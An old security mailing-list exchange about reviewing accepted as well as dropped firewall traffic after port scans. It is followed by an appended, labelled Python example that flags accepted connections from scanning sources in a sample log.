You are right. The most you can do is make note and pay attention to not only what was blocked, but perhaps what made it through. Often when looking at firewall logs, my engineer looked only at drops, and never at the approved. So one day, he told me about a particular port scan we got and I looked at all the logs for the attacker. I found that they got through to an ftp server that accepted the packet. Further analysis showed that the attacker attempted to gain root on the box. My engineer didn't catch it again because he was only concerned with drops.
Mrcorp

-----Original Message-----
From: Mike V [mailto:[EMAIL PROTECTED]]
Sent: Monday, February 04, 2002 11:48 AM
To: Hornat, Charles; [EMAIL PROTECTED]
Subject: Re: Vulnerability scanners:

Since the scan included both a port scan, but attempts at various GET requests and directories, even though port 80 was closed. Thus, that rules out anything like Code Red/Nimda/sadmind worm, etc. Seems much more like a scanner checking for known vulnerabilities/brute force method.

Below is the log information:
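Added example, not part of the original messages: one way to apply the advice in the reply above, reviewing what a scanning source was allowed to reach as well as what was dropped. The key=value log format, the field names, the threshold and the sample lines are all assumptions constructed for illustration; they are not the log format quoted in the thread.

```python
from collections import defaultdict

# Constructed sample lines in a hypothetical key=value firewall log format.
SAMPLE_LOG = """\
2002-02-01T18:28:08Z action=DROP src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=22
2002-02-01T18:28:09Z action=DROP src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=23
2002-02-01T18:28:10Z action=DROP src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=25
2002-02-01T18:28:11Z action=DROP src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=80
2002-02-01T18:28:12Z action=DROP src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=1433
2002-02-01T18:29:05Z action=ACCEPT src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=21
2002-02-01T18:30:00Z action=ACCEPT src=198.51.100.20 dst=192.0.2.25 proto=tcp dport=25
2002-02-01T18:30:02Z action=DROP src=198.51.100.20 dst=192.0.2.25 proto=tcp dport=113
2002-02-01T18:31:40Z action=ACCEPT src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=21
2002-02-01T18:32:00Z truncated line without fields
"""

REQUIRED = ("action", "src", "dst", "dport")


def parse_line(line):
    """Return a record dict, or None if the line is malformed."""
    parts = line.split()
    if len(parts) < 2:
        return None
    fields = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
    if any(key not in fields for key in REQUIRED):
        return None
    try:
        dport = int(fields["dport"])
    except ValueError:
        return None
    return {
        "ts": parts[0],
        "action": fields["action"].upper(),
        "src": fields["src"],
        "dst": fields["dst"],
        "dport": dport,
    }


def accepted_from_scanners(lines, min_dropped_targets=5):
    """Map each scanning source to the connections the firewall accepted.

    A source counts as a scanner once it has been dropped on at least
    min_dropped_targets distinct (dst, dport) pairs (assumed threshold).
    All lines are read before deciding, so an accept logged before the
    drops is still reported.
    """
    dropped = defaultdict(set)
    accepted = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["action"] == "DROP":
            dropped[rec["src"]].add((rec["dst"], rec["dport"]))
        elif rec["action"] == "ACCEPT":
            accepted[rec["src"]].append((rec["ts"], rec["dst"], rec["dport"]))
    return {
        src: sorted(accepted[src])
        for src, targets in dropped.items()
        if len(targets) >= min_dropped_targets and src in accepted
    }


if __name__ == "__main__":
    for src, hits in accepted_from_scanners(SAMPLE_LOG.splitlines()).items():
        for ts, dst, dport in hits:
            print(f"{src} scanned, then was ACCEPTED to {dst}:{dport} at {ts}")
```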